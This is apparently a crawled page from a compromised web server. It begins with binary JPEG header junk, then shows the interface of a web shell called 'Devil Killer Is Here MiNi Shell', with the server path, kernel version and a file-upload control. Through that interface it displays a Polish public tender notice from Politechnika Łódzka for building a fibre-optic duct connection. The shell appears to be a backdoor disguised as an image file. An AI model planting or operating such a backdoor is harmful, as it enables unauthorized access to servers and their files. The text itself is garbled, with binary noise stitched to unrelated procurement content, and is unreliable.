JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20231110/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20231110/0048807001-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa doziemnego przyłącza MSK LODMAN dla Akademii Sztuk Pięknych. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Politechnika Łódzka Uczelniane Centrum Informatyczne</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000001583</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Wólczańska 223</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">93-005</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zp-uci@info.p.lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.zp.p.lodz.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - uczelnia publiczna</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa doziemnego przyłącza MSK LODMAN dla Akademii Sztuk Pięknych. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-93339a8c-7fb3-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00488070</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-11-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00102428/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.2 Budowa przyłącza światłowodowego do budynku ASP</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://plodz.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://plodz.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W niniejszym postępowaniu o<br/>udzielenie zamówienia składanie ofert, przekazywanie dokumentów lub oświadczeń oraz wymiana informacji między zamawiającym<br/>a wykonawcą, odbywa się przy użyciu<br/>środków komunikacji elektronicznej. 2. Korespondencję, powołując się w tytule na nazwę i numer postępowania, należy kierować:<br/>2.1. za pośrednictwem Platformy znajdującej się pod adresem:<br/>https://plodz.ezamawiajacy.pl w zakładce „Korespondencja”; 2.2. drogą elektroniczną na adres: zp-uci@info.p.lodz.pl. 3.<br/>Zgłoszenie do postępowania wymaga zalogowania wykonawcy do systemu na<br/>subdomenie Politechniki Łódzkiej https://plodz.ezamawiajacy.pl lub https://oneplace.marketplanet.pl 4. Wykonawca po wybraniu<br/>opcji „przystąp do postępowania” zostanie przekierowany na stronę https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony<br/>o możliwości zalogowania lub założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego:<br/>podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje regulamin, używa polecenia<br/>„zarejestruj się”. 5. Rejestracja wykonawcy trwa maksymalnie do 2 dni roboczych, zamawiający zaleca zatem wykonawcom<br/>uwzględnienie czasu niezbędnego na rejestrację w procesie<br/>złożenia oferty w niniejszym postępowaniu. 6. Po założeniu konta wykonawca ma możliwość złożenia oferty w postępowaniu. Oferta<br/>musi być sporządzona w języku polskim i złożona pod rygorem nieważności w postaci elektronicznej za pośrednictwem Platformy<br/>dostępnej pod adresem<br/>https:/plodz.ezamawiajacy.pl. 7. W przypadku wątpliwości i problemów związanych z korzystaniem z Platformy, wykonawca może<br/>skorzystać z instrukcji zamieszczonych w jej zakładce pn. „Regulacje i<br/>procedury procesu zakupowego” lub skontaktować się z dostawcą tego rozwiązania informatycznego pod nr (22) 257-22-23 (infolinia<br/>dostępna w dni robocze, w godzinach 9.00-17.00), e-mail:oneplace@marketplanet.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, zamawiający informuje, że:<br/>1. administratorem Pani/Pana danych osobowych jest Politechnika Łódzka, ul. Żeromskiego 116, 90-924 Łódź;<br/>2. kontakt z inspektorem ochrony danych osobowych Zamawiającego można uzyskać za pośrednictwem adresu e-mailowego:<br/>rbi@adm.p.lodz.pl;<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie niniejszego zamówienia publicznego;<br/>4. dane osobowe przetwarzane będą przez spółkę Otwarty Rynek Elektroniczny S.A. z siedzibą w Warszawie (02-672), przy ul.<br/>Domaniewskiej 49, wpisaną do Rejestru Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla<br/>m.st. Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS: 0000041441, REGON:<br/>017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której Politechnika Łódzka prowadzi postępowania o<br/>udzielenie zamówienia publicznego, działającą pod adresem: https://plodz.ezamawiajacy.pl;<br/>5. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 Ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych, dalej „Ustawa”;<br/>6. Pani/Pana dane osobowe będą przechowywane przez okres 10 lat zgodnie z Jednolitym Rzeczowym Wykazem Akt Politechniki<br/>Łódzkiej;<br/>7. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach Ustawy, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego - konsekwencje<br/>niepodania określonych danych wynikają z Ustawy;<br/>8. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art.<br/>22 RODO;<br/>9. posiada Pani/Pan:<br/>9.1. na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>9.2. na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych;<br/>9.3. na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>Ogłoszenie nr 2022/BZP 00076148/01 z dnia 2022-03-04<br/>2022-03-04 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>przypadków, o których mowa w art. 18 ust. 2 RODO;<br/>9.4. prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>10. nie przysługuje Pani/Panu:<br/>10.1. w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>10.2. prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>10.3. na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>11. Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych<br/>na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania władzy<br/>publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są<br/>przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">UCI.262.3.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 150000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.	Przedmiot zamówienia:<br/>2.1.	Przedmiotem zamówienia jest wykonanie robót budowlanych w zakresie przyłącza sieci światłowodowej MSK LODMAN dla Akademii Sztuk Pięknych, ul. Księży Młyn 13/15 (patrz załączone projekty). <br/>Zamówienie obejmuje m.in.:<br/>•	zorganizowanie budowy, w tym dokonanie wszystkich wymaganych prawem zgłoszeń i uzgodnień koniecznych do rozpoczęcia budowy przyłącza;<br/>•	pozwolenie na prowadzenie robót budowlanych na obszarze wpisanym do rejestru zabytków, oraz prowadzenie nadzoru archeologicznego, o których mowa w projekcie są w posiadaniu zamawiającego, jako załączniki do dokumentacji projektowej:<br/>załącznik1_Pozwolenie_na_prowadzenie_badań_archeologicznych<br/>i załącznik2_Pozwolenie_na_roboty_budowlane_przy_zabytku)<br/>•	budowę pod bocznicą kolejową, na której zakończona została rewitalizacja wykonać należy w porozumieniu z Gwarantem - załącznik3_oswiadczenie_gwarancja_Koci_Szlak<br/>•	budowę rurociągu RK356 (4xRHDPE 40/3,7 + 1 mikrorurka x12/8 - 392m) - 672 m;<br/>•	budowę rurociągu RK356A (4xRHDPE 40/3,7) - 39 m;<br/>•	całkowita długość rurociągów do zbudowania 711 m;<br/>•	budowę studzienek teletechnicznych SK-2 - 3 szt.;<br/>•	instalację kabla sygnalizacyjnego i taśmy ostrzegawczej na odcinkach nowobudowanych rurociągów oraz rur osłonowych RHDPE 160/9.1 w przewiertach i w okolicach kolizji z innymi urządzeniami podziemnymi (zgodnie z projektem); <br/>•	zorganizowanie odbiorów cząstkowych budowy (pasy drogowe, tereny miejskie, gminne, prywatne itp.) oraz odbioru końcowego;<br/>•	wykonanie dokumentacji powykonawczej. <br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w załączonej do Specyfikacji Warunków Zamówienia (dalej – „SWZ”) dokumentacji projektowo-wykonawczej (projektach budowlanych: PAB1 LODMAN całość, projekcie wykonawczym: PW Rurociągi kablowe RK356-RK357, przedmiarach robót: przedmiar_RK356-356A PR aktualizacja23, oraz w Specyfikacji Technicznej Wykonania i Odbioru Robót: STWiOR Księży Młyn linia światłowodowa i rurociąg kablowy, Projekcie Planu Bezpieczeństwa i Ochrony Zdrowia: Projekt planu BIOZ Księzy Młyn). <br/>Uwaga: Przedmiot zamówienia nie obejmuje budowy zaprojektowanych linii światłowodowych, oraz rurociągu RK357 przyłącza do Muzeum Pałac Herbsta<br/>Zamawiający załączył przedmiary robót, jednak należy je traktować jako przybliżone, ponieważ są one zależne od możliwości technologicznych konkretnego Wykonawcy i z tego powodu mają charakter referencyjny. Zamawiający wymaga, aby Wykonawca dokonał samodzielnej oceny dokumentacji projektowej i ew. sporządził własny przedmiar, zgodny ze swoimi standardami. Jeśli – zdaniem Wykonawcy – występują jakieś rozbieżności pomiędzy opublikowanym przedmiarem, a dokumentacją techniczną, to należy zastosować się do zapisów projektów. <br/>W przypadku niewystarczającego uwzględnienia w przedmiarze - zdaniem Wykonawcy - prac przygotowawczych, demontażowych, wyburzeniowych, odtworzeniowych, porządkowych, Wykonawca zobowiązany jest uwzględnić ten fakt i skorygować to w swoim przedmiarze oraz - w konsekwencji - w ofercie. Wykonawca musi przewidzieć wszystkie okoliczności, które mogą wpłynąć na koszty realizacji zamówienia, np. konieczność wniesienia opłat za czynności opisane w punkcie 4 niniejszego rozdziału SWZ (oraz ew. inne niewymienione) i uwzględnić je w ryczałtowej cenie ofertowej. <br/>3.	Wykonanie zamówienia będzie realizowane w następujących fazach:<br/>3.1.	faza 1: zorganizowanie budowy oraz fizyczne wybudowanie infrastruktury będącej przedmiotem zamówienia - po wykonaniu pierwszej fazy możliwy będzie odbiór techniczny budowy i fakturowanie częściowe w wysokości 80% wynagrodzenia ryczałtowego;<br/>3.2.	faza 2: wykonanie dokumentacji powykonawczej i formalne zakończenie budowy - po wykonaniu drugiej fazy nastąpi końcowy odbiór budowy i fakturowanie pozostałej 20% części wynagrodzenia wykonawcy.<br/>4.	W ramach organizacji procesu budowlanego wykonawca zobowiązany jest do dokonania wszelkich czynności formalno-prawnych i organizacyjnych związanych z realizacją zamówienia. W związku z tym do obowiązków wykonawcy należy w szczególności:<br/>4.1.	Prowadzenie dokumentacji budowy (bez jej rejestracji przez nadzór budowlany, gdyż realizacja niniejszych przedsięwzięć nie wymaga uzyskania pozwolenia na budowę i formalnego prowadzenia dziennika budowy), w której zawarte zostaną wszelkie istotne informacje i zdarzenia związane z realizacją budowy, m. in.: dane kierownika budowy, dane inspektora nadzoru inwestorskiego, wprowadzenie na plac budowy, potwierdzenie przez geodetę wytyczenia geodezyjnego w terenie, potwierdzenie wykonania ewentualnych robót zakrytych, testów oraz pomiarów, ewentualne zmiany w projekcie, ewentualne uwagi inspektora nadzoru, wykonanie inwentaryzacji geodezyjnej powykonawczej, oświadczenie kierownika budowy o zakończeniu prac i zwrocie placu budowy. <br/>4.2.	Uzgodnienie (przed rozpoczęciem budowy) z zarządcami obiektów, na których będą prowadzone prace - terminu i trybu wprowadzenia, zasad i warunków udostępnienia na czas budowy poszczególnych placów budowy oraz zorganizowanie ew. wprowadzenia na place budowy i sporządzenie odpowiednich protokołów, przy czym wszelkie koszty zajęcia terenu na czas budowy i ew. nadzorów branżowych ponosi wykonawca.<br/>4.3.	Przygotowanie na własny koszt - jeśli zaistnieje taka konieczność - wszelkich niezbędnych dokumentów oraz pozyskanie odpowiednich umów na korzystanie w czasie budowy z pasa drogowego i ewentualnie innych terenów miejskich, np. projektu organizacji ruchu w pasach drogowych (o ile taki projekt będzie wymagany przez odpowiednie władze) oraz ewentualnych pozostałych decyzji i umów związanych z innymi terenami miejskimi (np. terenami zielonymi). Jedyne koszty jakie w związku z tym pokryje zamawiający, to opłaty za umieszczenie infrastruktury podziemnej w pasach drogowych i ewentualnie innych terenach (np. miejskich, gminnych, PKP).<br/>4.4.	Wytyczenie geodezyjne budowanego przyłączy i przeprowadzenie geodezyjnej inwentaryzacji powykonawczej - wykonawca ponosi wszelkie koszty inwentaryzacji, w tym związane z zatwierdzeniem tej dokumentacji przez władze nadzoru geodezyjnego, naniesieniem zbudowanych obiektów na mapę zasadniczą.<br/>4.5.	Przeprowadzenie wszelkich prac związanych z usunięciem lub zabezpieczeniem kolizji budowanych rurociągów kablowych z infrastrukturą (podziemną i naziemną) innych operatorów lub gestorów sieci - wykonawca pokrywa wszelkie koszty z tym związane, w tym opłaty za nadzór operatorski.<br/>4.6.	Zapewnienie warunków, aby prace budowlane wykonywane były zgodnie z zasadami sztuki budowlanej, przepisami BHP oraz planem BiOZ, w tym prowadzenie bieżącej kontroli tej zgodności.<br/>4.7.	W przypadku wystąpienia niemożności (bądź istotnych trudności) ścisłego zrealizowania projektu (np. z powodu wykrycia niezgodności z mapą projektową położenia lub stanu obiektów podziemnych), współdziałanie z projektantem, zamawiającym i inspektorem nadzoru w celu wykonania modyfikacji projektu lub projektu zamiennego i jego legalizacji.<br/>4.8.	Zorganizowanie i uczestniczenie w częściowych odbiorach na terenach i obiektach, na których prowadzone będą prace oraz uzyskanie oświadczeń o odbiorze terenu po budowie i braku jakichkolwiek roszczeń (związanych z budową) ze strony zarządców tych obiektów i terenów w stosunku do wykonawcy lub zamawiającego.<br/>4.9.	Zorganizowanie i uczestniczenie w technicznym odbiorze robót (przegląd całości zbudowanych obiektów i sprawdzenie ich jakości wykonania oraz zgodności z projektem, w tym skontrolowanie jakości opisów i oznaczeń elementów wybudowanej infrastruktury) oraz odbiorze końcowym, w tym przygotowanie odpowiednich protokołów odbioru.<br/>4.10.	Przygotowanie dokumentacji powykonawczej: budowlanej i pomiarowej - kierownik budowy potwierdza na mapach powykonawczych zgodność wykonanych robót z projektem, a w dokumentacji pomiarowej zgodność wyników z wymaganiami odbiorowymi i zdatność obiektu do eksploatacji.<br/>4.11.	Przekazanie zamawiającemu w trakcie odbioru technicznego robót:<br/>4.11.1.	inwestorskich egzemplarzy zgłoszeń i umów legalizujących budowę, o ile nie zostały one przekazane na bieżąco w trakcie trwania prac;<br/>4.11.2.	kompletnej kopii szkiców geodezyjnych powykonawczych z tabelami współrzędnych punktów charakterystycznych;<br/>4.11.3.	powykonawczej dokumentacji przecisków i przewiertów (profile przewiertów); <br/>4.11.4.	mapy powykonawczej – np. w formie kopii mapy zasadniczej pozyskanej z Powiatowego Zasobu Geodezyjnego i Kartograficznego po wkreśleniu powykonawczym wybudowanych obiektów; <br/>4.11.5.	kompletu oryginałów dokumentów związanych z budową i jej zakończeniem, wraz z potwierdzeniem kierownika budowy na mapie powykonawczej zgodności wykonanych robót z projektem.<br/>W/w dokumentacja winna być dostarczona w formie papierowej jak i elektronicznej (skany dokumentów w formacie PDF, mapy i rysunki w formatach ACAD DWG oraz PDF.<br/>4.12.	Zapewnienie na własny koszt serwisu gwarancyjnego przez cały okres trwania gwarancji przedstawiony w ofercie i usuwanie usterek wykrytych w czasie eksploatacji zbudowanych obiektów i dostarczonych i zainstalowanych urządzeń.<br/>4.13.	W czasie ostatniego półrocza okresu gwarancyjnego - zorganizowanie i uczestniczenie w odbiorze pogwarancyjnym i usunięcie wykrytych usterek na własny koszt oraz przygotowanie odpowiedniego protokołu tego przeglądu.<br/>.<br/>Zamawiający zastrzega, że na wykonawcy spoczywa obowiązek przygotowywania (pozyskania) odpowiednich dokumentów i zapewnienie ich właściwego obiegu pomiędzy stronami: inwestorem (zamawiającym), urzędami i organami nadzoru budowlanego, projektantem oraz inspektorem nadzoru. We wszystkich ww. czynnościach wykonawca będzie miał zapewnione współdziałanie inspektora nadzoru i/lub wyznaczonych pracowników zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">175 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający udzieli zamówienia wykonawcy, którego oferta uzyska<br/>największą wartość punktową, zgodnie z zasadami opisanymi w Rozdziale XX SWZ pn. &#34;Opis<br/>kryteriów, którymi zamawiający będzie się kierował przy wyborze oferty, wraz z podaniem znaczenia<br/>tych kryteriów oraz sposobu oceny oferty&#34;. 2. Całkowita liczba punktów obliczona zostanie z<br/>dokładnością do dwóch miejsc po przecinku. 3. Zamawiający wybierze najkorzystniejszą ofertę bez<br/>przeprowadzenia negocjacji.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">85</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy 